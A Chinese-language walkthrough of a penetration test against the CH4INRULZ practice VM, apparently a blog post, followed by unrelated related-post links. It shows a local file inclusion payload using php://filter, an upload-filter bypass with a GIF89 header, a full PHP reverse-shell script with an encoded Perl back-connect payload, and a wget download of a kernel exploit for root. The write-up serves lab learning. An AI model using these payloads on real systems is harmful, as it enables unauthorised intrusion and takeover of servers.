CH4INRULZ靶机渗透测试

  • 环境
  • 工具
  • 流程

环境

kali攻击机
192.168.1.105
靶机
192.168.1.103

工具

hackbar,netdiscover,nmap,searchsploit,dirb,御剑,在线解码工具,wget

流程

首先对目标网段进行主机发现扫描然后扫端口

发现有80端口上去也没有发现什么收获
回来目录爆破发现几个目录啥也没有就http://192.168.1.103/development这个目录弹了个登录框可咱也没有账号密码啊


换御剑继续扫

看见一个bak访问下载下载后发现里面有账号和一个hash加密的密码应该就是上面那个的账号密码了
账号密码提出来放在新建的hack文件里用john解密
账号frank密码frank!!!登录上去得到一个目录uploader

访问一下一个文件上传界面凭经验应该有文件上传漏洞但不知道路径白搭

反过头来收集8011端口的信息dirb爆目录得到http://192.168.1.103:8011/api/
访问得到几个目录

只有files_api.php可以访问

第二句话说了要file可能存在文件包含漏洞先用get方式失败
post方式提交brupsuite截断分析一下

成功返回了/etc/passwd信息存在文件包含漏洞


看一下apache服务器配置文件
构造伪代码请求拿uploader.php的源码

 "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" "http://10.0.3.130:8011/api/files_api.php"


解码得到源码得到上传路径
kali本地找个shell脚本

改下参数为kali ip 和设置端口号

后缀改为gif

上传
上传失败

用brupsuite截断加上文件头GIF89再发送上传成功
查看一下成功上传了


开启本地监听

然后访问该文件
但是没有返回应该是脚本问题把被过滤了

在网上又找了一个脚本大家可以借鉴

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

改好ip端口再来方法一样
成功返回了shell
用python脚本优化终端 python -c 'improt pty; pty.spawn("/bin/bash")

uname -a 得到内核版本在searchploit上搜到本地提权的脚本15258.c

把脚本cp到/var/www/html下然后用nohup python -m SimpleHTTPServer 8000 &把本目录放在8000端口下

靶机用wget http://192.168.1.107:8000/15258.c(在tmp文件夹下下载该文件夹权限较松)编译到文件hackgcc 15258.c -o hack

chmod 777 hack赋予运行权限
然后运行./hack
成功拿到root权限

CH4INRULZ靶机渗透测试相关推荐

  1. DC-2靶机渗透测试流程

    目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. ​四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...

  2. 靶机渗透测试(covfefe)

    靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...

  3. 靶机渗透测试(Tre: 1)

    靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate) ...

  4. DC-3靶机渗透测试

    DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...

  5. 靶机渗透测试(unknowndevice64: 1)

    靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...

  6. Eric靶机渗透测试通关全教程

    环境准备 联不联网无所谓,主要是要在同一网段下 靶机:Eric 攻击机:Kali (192.168.56.102) 渗透目标 拿到普通用户下的flag 拿到root用户下的flag 渗透测试实战 已知 ...

  7. DC-5靶机渗透测试

    渗透测试 靶机所需环境 信息收集 漏洞利用 上传一句话shell 蚁剑连接 权限提升 文件生成 文件一 文件二 文件三 获取root权限 靶机所需环境 目标靶机:DC-5(192.168.160.15 ...

  8. Eric靶机渗透测试

    Eric靶机渗透练习 攻击机:kali Ip:192.168.0.3 靶机:eric Ip:192.168.0.4 找到靶机ip:192.168.0.4 nmap -sF 192.168.0.0/24 ...

  9. DC-3靶机 渗透测试

    DC-3 查看靶机mac地址 获取IP地址 Nmap JooScan sqlmap john 上传Webshell nc反弹 提权 DC-3只有一个目标获得root权限,拿到flag. 查看靶机mac ...

最新文章

  1. python logging.getlogger_logging.getLogger与logger的父子关系
  2. Spring Aop实例
  3. java题目不会做那么解答_有几道JAVA的题目不会做 哪位高手来解答一下!谢
  4. 所有计算机都可以安装win7,几种安装win7系统的方法介绍
  5. 业务逻辑 : forex mlm
  6. 2、Jupyter Notebook 快速入门
  7. 余额宝技术架构及演进
  8. 【iOS】打印方法名
  9. phpexcel读取输出操作
  10. Mini-project # 1 - Rock-paper-scissors-lizard-Spock
  11. 数学和计算机竞赛,数学奥赛VS信息学奥赛,数学基础扎实的孩子
  12. Cisco2811路由器的首次接触
  13. 微信广告转化统计java,百度推广oCPC微信号复制转化次数统计系统数据接口
  14. KDF- key derivation function
  15. Linux如何测试驱动性能,掌握 Linux PC 性能之基准测试
  16. 解除OA系统Word文档不能修改编辑问题
  17. 使用openssl转换pem为pfx证书
  18. 企业网络和家庭网络区别
  19. 自己实现一个Spring 框架
  20. XCUIApplication API

热门文章

  1. 将Win10家庭版升级到Win10专业版详细步骤
  2. Mac如何安全地彻底卸载软件?
  3. 放假了,怎么还得熬夜切割……
  4. access数据库SQL复制表
  5. 机器学习流程——监督学习篇
  6. 2019,新的一年。
  7. 高中计算机学ps有用吗,学习ps有用吗?
  8. 二分图最大匹配(匈牙利算法,Dinic网络流算法)
  9. 静态内部类的单例模式如何保证线程安全
  10. Android 自定义ImageView线型渐变色渲染图片